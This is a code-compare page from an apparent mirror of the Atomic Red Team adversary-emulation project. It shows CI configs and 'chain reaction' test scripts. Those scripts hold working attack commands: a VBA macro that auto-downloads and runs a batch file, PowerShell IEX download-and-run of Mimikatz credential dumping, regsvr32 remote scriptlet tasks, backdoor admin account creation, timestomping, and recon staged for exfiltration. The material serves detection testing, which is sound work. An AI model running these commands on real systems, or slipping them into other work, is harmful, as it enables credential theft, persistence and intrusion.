security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:clr2of8-patch-43
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:admin-guide
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

2 Commits
clr2of8-patch-43 .. admin-guide

Author SHA1 Message Date
Keith McCammon f475ca3b1e Use site URL 2019-05-07 08:42:29 -06:00
Keith McCammon 0c4c29b19d Initial checkin of admin documentation. 2019-05-07 08:37:26 -06:00
1316 changed files with 186464 additions and 1605796 deletions
Expand all files Collapse all files
.circleci/config.yml
+51
View File
@@ -0,0 +1,51 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
.github/ISSUE_TEMPLATE/idea.md
-29
View File
@@ -1,29 +0,0 @@
---
name: Idea
about: An idea for a feature or improvement to Atomic Red Team.
title: 'Idea: '
labels: 'idea'
assignees: ''
---
### Use-cases
<!---
In order to properly evaluate a feature request, it is necessary to understand the use-cases for it.
Please describe below the _end goal_ you are trying to achieve that has led you to request this feature.
Please keep this section focused on the problem and not on the suggested solution. We'll get to that in a moment, below!
-->
### Proposal
<!---
If you have an idea for a way to address the problem via a change, please describe it below.
If you're not sure of some details, don't worry! When we evaluate the feature request we may suggest modifications.
-->
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/new_atomic.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Submit a new test
about: Submit a new Atomic Red Team atomic test.
title: 'TXXX: Your test name here'
labels: 'new-test'
assignees: ''
---
<!--
For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
-->
### Technique ID: TXXXX
### Additional Details
<!--
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
-->
.github/ISSUE_TEMPLATE/website_change.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Website change
about: Propose a change to the website at https://atomicredteam.io
title: 'Website: '
labels: 'website'
assignees: ''
---
### Why the change?
### A summary of the change
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/problem_report.md → .github/issue_template.md
+2 -8
View File
@@ -1,11 +1,5 @@
---
name: Problem
about: Tell us about a problem you've encountered.
title: 'Problem: '
labels: 'problem'
assignees: ''
# Report
---
## What did you do?
Please replace this with what you did.
@@ -29,4 +23,4 @@ e.g. 💥
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
.github/workflows/assign-labels.yml
-59
View File
@@ -1,59 +0,0 @@
name: assign-labels
on:
workflow_run:
workflows: [ "validate-atomics" ]
types:
- completed
jobs:
assign-labels:
runs-on: ubuntu-latest
steps:
- name: download-artifact
uses: actions/github-script@v6
with:
script: |
let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
repo: context.repo.repo,
run_id: context.payload.workflow_run.id,
});
let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
return artifact.name == "labels.json"
})[0];
let download = await github.rest.actions.downloadArtifact({
owner: context.repo.owner,
repo: context.repo.repo,
artifact_id: matchArtifact.id,
archive_format: 'zip',
});
let fs = require('fs');
fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/labels.zip`, Buffer.from(download.data));
- name: unzip-artifact
run: unzip labels.zip
- name: assign-labels-and-reviewers
uses: actions/github-script@v6
with:
script: |
let fs = require('fs');
const obj = JSON.parse(fs.readFileSync('./labels.json'));
console.log(obj)
if(obj.labels.length > 0){
await github.rest.issues.addLabels({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
labels: obj.labels
})
}
if(obj.maintainers.length > 0){
await github.rest.issues.addAssignees({
issue_number: obj.pr,
owner: context.repo.owner,
repo: context.repo.repo,
assignees: obj.maintainers
});
}
.github/workflows/generate-counter.yml
-37
View File
@@ -1,37 +0,0 @@
name: generate-svg-counter
on:
push:
branches:
- master
jobs:
generate-counter:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: actions/setup-python@v4
with:
python-version: '3.11.2'
cache: 'poetry'
- name: Generate shields.io URL
run: python generate_shield.py atomics/
id: shield
- name: Generate shields.io URL
run: python generate_counter.py -d atomics/
id: counter
- name: Update README
run: |
sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
shell: bash
- name: update github with new site
run: |
# configure git to prep for commit
git config user.email "opensource@redcanary.com"
git config user.name "publish bot"
git config --global push.default simple
git add README.md
git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
# push quietly to prevent showing the token in log
# no need to provide any credentials
git push
.github/workflows/generate-docs.yml
-63
View File
@@ -1,63 +0,0 @@
name: generate-docs
on:
push:
branches:
- master
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v2
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
ref: 'master'
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
bundler-cache: true
- name: Generate and commit unique GUIDs for each atomic test
run: |
bin/generate-guids.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing GUID changes because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team GUID generator"
git add atomics
git commit -am "Generate GUIDs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [skip ci]"
git push origin $GITHUB_REF_NAME -f
fi
- name: generate markdown docs for atomics
run: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
.github/workflows/stale.yml
-19
View File
@@ -1,19 +0,0 @@
name: 'Close stale issues and PRs'
on:
schedule:
- cron: '30 1 * * *'
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v7
with:
stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
days-before-issue-stale: 30
days-before-pr-stale: 45
days-before-issue-close: 10
days-before-pr-close: 10
.github/workflows/validate-atomics.yml
-80
View File
@@ -1,80 +0,0 @@
name: validate-atomics
on:
pull_request:
branches:
- master
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v3
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v4
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: validate the format of atomics tests against the spec
run: |
poetry run python bin/validate/validate.py
validate-terraform:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: hashicorp/setup-terraform@v2
- name: Terraform fmt
id: fmt
run: terraform fmt -recursive -check
continue-on-error: false
upload:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v3
- name: Install poetry
run: pipx install poetry
- name: setup python3.11
uses: actions/setup-python@v4
id: setup-python
with:
python-version: "3.11.2"
cache: "poetry"
- uses: actions/github-script@v6
id: get_pr_number
with:
script: |
if (context.issue.number) {
// Return issue number if present
return context.issue.number;
} else {
// Otherwise return issue number from commit
return (
await github.rest.repos.listPullRequestsAssociatedWithCommit({
commit_sha: context.sha,
owner: context.repo.owner,
repo: context.repo.repo,
})
).data[0].number;
}
result-encoding: string
- name: Install dependencies
run: poetry install --no-interaction --no-root
- name: save labels and reviewers into a file.
run: |
poetry run python bin/generate_labels.py -t ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}'
- uses: actions/upload-artifact@v3
with:
name: labels.json
path: pr/
.gitignore
-55
View File
@@ -2,62 +2,7 @@
.DS_Store
.vscode
.atom
atomic-red-team/enterprise-attack.json
# Compiled Object files
*.slo
*.lo
*.o
*.obj
# vs logs
*.tlog
*.log
# Precompiled Headers
*.gch
*.pch
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
# Local .terraform directories
**/.terraform/*
# .tfstate files
*.tfstate
*.tfstate.*
**/*.terraform.lock.hcl
# Crash log files
crash.log
crash.*.log
# Ignore override files as they are usually used to override resources locally and so
# are not checked in
override.tf
override.tf.json
*_override.tf
*_override.tf.json
# Include override files you do wish to add to version control using negated pattern
# !example_override.tf
# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
# example: *tfplan*
# Ignore CLI configuration files
.terraformrc
terraform.rc
*.pyc
# The ExternalPayloads folder
ExternalPayloads
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
ARTifacts/Chain_Reactions/atomic-hello
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
ARTifacts/Chain_Reactions/atomic-hello.macos
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+106
View File
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
